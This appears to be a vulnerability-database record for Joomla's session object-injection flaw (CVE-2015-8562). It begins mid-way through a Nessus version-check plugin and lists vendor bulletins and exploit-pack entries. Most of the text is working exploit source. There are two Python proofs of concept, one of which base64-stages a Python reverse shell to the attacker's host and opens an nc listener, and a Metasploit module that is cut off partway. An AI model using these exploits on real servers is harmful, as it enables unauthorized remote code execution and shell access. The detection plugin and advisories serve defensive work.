\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"3.4.7\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.6 vulnerable to RCE\n# https://developer.joomla.org/security-centre/639-20151206-core-session-hardening.html\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, sqli:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "joomla": [{"lastseen": "2019-05-29T19:31:43", "bulletinFamily": "software", "description": "Inadequate filtering of request data leads to a Directory Traversal vulnerability.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-635", "type": "joomla", "title": "[20151204] - Core - Directory Traversal", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:48", "bulletinFamily": "software", "description": "Add additional CSRF hardening in com_templates.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-633", "type": "joomla", "title": "[20151202] - Core - CSRF Hardening", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:48", "bulletinFamily": "software", "description": "Browser information is not filtered properly while saving the session values into the database which leads to a Remote Code Execution vulnerability.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-630", "type": "joomla", "title": "[20151201] - Core - Remote Code Execution Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:46", "bulletinFamily": "software", "description": "Failure to properly sanitise input data from the XML install file located within an extension's package archive allows for directory traversal.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-634", "type": "joomla", "title": "[20151203] - Core - Directory Traversal", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T19:48:28", "bulletinFamily": "exploit", "description": "**Name**| joomla_session_unserialize \n---|--- \n**CVE**| CVE-2015-8562 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Joomla session unserialize 1.5 to 3.4.5 \n**Notes**| Repeatability: Infinite \nVENDOR: Joomla \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 \nCVE Name: CVE-2015-8562 \n\n", "modified": "2015-12-16T21:59:00", "published": "2015-12-16T21:59:00", "id": "JOOMLA_SESSION_UNSERIALIZE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/joomla_session_unserialize", "title": "Immunity Canvas: JOOMLA_SESSION_UNSERIALIZE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "id": "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A", "type": "saint", "title": "Joomla User-Agent PHP object injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "id": "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "title": "Joomla User-Agent PHP object injection", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:27", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "id": "SAINT:150A052478728FE6FC97F9B52382B525", "title": "Joomla User-Agent PHP object injection", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T09:14:25", "bulletinFamily": "exploit", "description": "Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution. CVE-2015-8562. Webapps exploit for php platform", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "EDB-ID:38977", "href": "https://www.exploit-db.com/exploits/38977/", "type": "exploitdb", "title": "Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution", "sourceData": "'''\r\n Simple PoC for Joomla Object Injection.\r\n Gary @ Sec-1 ltd\r\n http://www.sec-1.com/\r\n'''\r\n \r\nimport requests # easy_install requests\r\n \r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': user_agent\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, headers=headers,cookies=cookies) \r\n return response\r\n \r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n \r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n \r\n \r\n \r\npl = generate_payload(\"system('touch /tmp/fx');\")\r\n \r\nprint get_url(\"http://172.31.6.242/\", pl)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38977/"}, {"lastseen": "2016-02-04T09:21:49", "bulletinFamily": "exploit", "description": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header. CVE-2015-8562,CVE-2015-8566. Webapps exploit for php platform", "modified": "2015-12-18T00:00:00", "published": "2015-12-18T00:00:00", "id": "EDB-ID:39033", "href": "https://www.exploit-db.com/exploits/39033/", "type": "exploitdb", "title": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header\r\n# Date: 12/17/2015\r\n# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)\r\n# Vendor Homepage: https://www.joomla.org/\r\n# Software Link: http://joomlacode.org/gf/project/joomla/frs/\r\n# Version: Joomla 1.5 - 3.4.5\r\n# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)\r\n# CVE : CVE-2015-8562\r\n\r\n\r\n'''\r\n Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562\r\n PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE\r\n\r\n Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): \r\n https://www.exploit-db.com/exploits/38977/\r\n\r\n Vulnerability Info, Exploit, Detection:\r\n https://breakpoint-labs.com/joomla-rce-cve-2015-8562/\r\n\r\n Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\" to avoid default logged to access.log\r\n\r\n Usage - Automate Blind RCE:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd\r\n $ touch /tmp/newhnewh \r\n\r\n Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444\r\n [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/\r\n [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444\r\n <Response [200]>\r\n [+] Spawning reverse shell....\r\n <Response [200]>\r\n\r\n Listening on [0.0.0.0] (family 0, port 4444)\r\n $ python -c \"import pty;pty.spawn('/bin/bash')\"\r\n www-data@ubuntu:/$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n www-data@ubuntu:/$ \r\n\r\n'''\r\n \r\nimport requests\r\nimport subprocess\r\nimport argparse\r\nimport sys\r\nimport base64\r\n \r\n# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)\r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests\r\n 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, headers=headers,cookies=cookies) \r\n return response\r\n\r\n\r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n\r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')\r\n parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')\r\n parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')\r\n parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')\r\n parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.cmd:\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Dropping into shell-like environment to perform blind RCE\"\r\n while True:\r\n command = raw_input('$ ')\r\n cmd_str = \"system('{}');\".format(command)\r\n pl = generate_payload(cmd_str)\r\n print get_url(args.RHOST, pl)\r\n\r\n # Spawn Reverse Shell using Netcat listener + Python shell on victim\r\n elif args.LPORT and args.LPORT:\r\n connection = \"'{}', {}\".format(args.LHOST, args.LPORT)\r\n\r\n # pentestmonkey's Python reverse shell one-liner:\r\n shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'''\r\n # Base64 encoded the Python reverse shell as some chars were messing up in the exploit\r\n encoded_comm = base64.b64encode(shell_str)\r\n # Stage 1 payload Str\r\n payload = \"echo {} | base64 -d > /tmp/newhnewh.py\".format(encoded_comm)\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Uploading python reverse shell with LHOST {} and {}\".format(args.LHOST, args.LPORT)\r\n # Stage 1: Uploads the Python reverse shell to \"/tmp/newhnewh.py\"\r\n pl = generate_payload(\"system('\"+payload+\"');\")\r\n print get_url(args.RHOST, pl)\r\n # Spawns Shell listener using netcat on LHOST\r\n listener = subprocess.Popen(args=[\"gnome-terminal\", \"--command=nc -lvp \"+args.LPORT])\r\n print \"[+] Spawning reverse shell....\"\r\n # Stage 2: Executes Python reverse shell back to LHOST:LPORT\r\n pl = generate_payload(\"system('python /tmp/newhnewh.py');\")\r\n print get_url(args.RHOST, pl)\r\n else:\r\n print '[!] missing arguments'\r\n parser.print_help()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39033/"}], "zdt": [{"lastseen": "2018-04-04T19:32:48", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-12-18T00:00:00", "published": "2015-12-18T00:00:00", "id": "1337DAY-ID-24758", "href": "https://0day.today/exploit/description/24758", "type": "zdt", "title": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header Exploit", "sourceData": "#!/usr/bin/env python\r\n \r\n# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header\r\n# Date: 12/17/2015\r\n# Exploit Author: original - [email\u00a0protected] Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)\r\n# Vendor Homepage: https://www.joomla.org/\r\n# Software Link: http://joomlacode.org/gf/project/joomla/frs/\r\n# Version: Joomla 1.5 - 3.4.5\r\n# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)\r\n# CVE : CVE-2015-8562\r\n \r\n \r\n'''\r\n Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562\r\n PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE\r\n \r\n Original PoC from [email\u00a0protected] Sec-1 ltd (http://www.sec-1.com): \r\n https://www.exploit-db.com/exploits/38977/\r\n \r\n Vulnerability Info, Exploit, Detection:\r\n https://breakpoint-labs.com/joomla-rce-cve-2015-8562/\r\n \r\n Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\" to avoid default logged to access.log\r\n \r\n Usage - Automate Blind RCE:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd\r\n $ touch /tmp/newhnewh \r\n \r\n Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444\r\n [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/\r\n [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444\r\n <Response [200]>\r\n [+] Spawning reverse shell....\r\n <Response [200]>\r\n \r\n Listening on [0.0.0.0] (family 0, port 4444)\r\n $ python -c \"import pty;pty.spawn('/bin/bash')\"\r\n [email\u00a0protected]:/$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n [email\u00a0protected]:/$ \r\n \r\n'''\r\n \r\nimport requests\r\nimport subprocess\r\nimport argparse\r\nimport sys\r\nimport base64\r\n \r\n# Heavy lifting from PoC author [email\u00a0protected] Sec-1 ltd (http://www.sec-1.com)\r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests\r\n 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, headers=headers,cookies=cookies) \r\n return response\r\n \r\n \r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n \r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')\r\n parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')\r\n parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')\r\n parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')\r\n parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')\r\n \r\n args = parser.parse_args()\r\n \r\n if args.cmd:\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Dropping into shell-like environment to perform blind RCE\"\r\n while True:\r\n command = raw_input('$ ')\r\n cmd_str = \"system('{}');\".format(command)\r\n pl = generate_payload(cmd_str)\r\n print get_url(args.RHOST, pl)\r\n \r\n # Spawn Reverse Shell using Netcat listener + Python shell on victim\r\n elif args.LPORT and args.LPORT:\r\n connection = \"'{}', {}\".format(args.LHOST, args.LPORT)\r\n \r\n # pentestmonkey's Python reverse shell one-liner:\r\n shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'''\r\n # Base64 encoded the Python reverse shell as some chars were messing up in the exploit\r\n encoded_comm = base64.b64encode(shell_str)\r\n # Stage 1 payload Str\r\n payload = \"echo {} | base64 -d > /tmp/newhnewh.py\".format(encoded_comm)\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Uploading python reverse shell with LHOST {} and {}\".format(args.LHOST, args.LPORT)\r\n # Stage 1: Uploads the Python reverse shell to \"/tmp/newhnewh.py\"\r\n pl = generate_payload(\"system('\"+payload+\"');\")\r\n print get_url(args.RHOST, pl)\r\n # Spawns Shell listener using netcat on LHOST\r\n listener = subprocess.Popen(args=[\"gnome-terminal\", \"--command=nc -lvp \"+args.LPORT])\r\n print \"[+] Spawning reverse shell....\"\r\n # Stage 2: Executes Python reverse shell back to LHOST:LPORT\r\n pl = generate_payload(\"system('python /tmp/newhnewh.py');\")\r\n print get_url(args.RHOST, pl)\r\n else:\r\n print '[!] missing arguments'\r\n parser.print_help()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24758"}, {"lastseen": "2018-03-02T17:40:00", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.", "modified": "2015-12-19T00:00:00", "published": "2015-12-19T00:00:00", "id": "1337DAY-ID-24763", "href": "https://0day.today/exploit/description/24763", "type": "zdt", "title": "Joomla 1.5 - 3.4.5 - HTTP Header Unauthenticated Remote Code Execution Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\r\n By storing user supplied headers in the databases session table it's possible to truncate the input\r\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\r\n from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\r\n In later versions the deserialisation of invalid session data stops on the first error and the\r\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\r\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\r\n },\r\n 'Author' =>\r\n [\r\n 'Marc-Alexandre Montpas', # discovery\r\n 'Christian Mehlmauer' # metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8562'],\r\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\r\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\r\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\r\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\r\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\r\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\r\n 'DisclosureDate' => 'Dec 14 2015',\r\n 'DefaultTarget' => 0)\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),\r\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({'uri' => target_uri.path })\r\n\r\n unless res\r\n vprint_error(\"Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n unless res.headers['X-Powered-By']\r\n vprint_error(\"Unable to determine the PHP version.\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\r\n version = Gem::Version.new(php_version)\r\n vulnerable = false\r\n\r\n # check for ubuntu and debian specific versions. Was fixed in\r\n # * 5.5.9+dfsg-1ubuntu4.13\r\n # * 5.3.10-1ubuntu3.20\r\n # * 5.4.45-0+deb7u1\r\n # Changelogs (search for CVE-2015-6835 or #70219):\r\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\r\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\r\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\r\n if rest && rest.include?('ubuntu')\r\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\r\n vprint_status(\"Found Ubuntu 